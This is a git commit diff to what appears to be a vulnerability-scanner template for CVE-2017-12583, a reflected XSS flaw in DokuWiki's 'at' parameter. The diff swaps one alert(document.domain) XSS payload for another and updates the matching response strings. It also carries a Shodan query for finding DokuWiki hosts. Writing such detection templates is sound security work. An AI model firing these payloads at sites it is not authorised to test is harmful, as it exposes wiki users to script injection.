commit
9d033a7670
|
@ -6,26 +6,26 @@ info:
|
|||
severity: medium
|
||||
metadata:
|
||||
shodan-query: 'http.title:"DokuWiki"'
|
||||
description: "DokuWiki through 2017-02-19b has XSS in the at parameter (aka the DATE_AT variable) to doku.php."
|
||||
reference: https://github.com/splitbrain/dokuwiki/issues/2061
|
||||
tags: cve,cve2017,xss,dokuwiki
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2017-12583
|
||||
cwe-id: CWE-79
|
||||
description: "DokuWiki through 2017-02-19b has XSS in the at parameter (aka the DATE_AT variable) to doku.php."
|
||||
tags: cve,cve2017,xss,dokuwiki
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=%3Csvg%20onload%3Dalert%28document.domain%29%3E'
|
||||
- '{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<svg onload=alert(document.domain)>'
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
|
|
Loading…
Reference in New Issue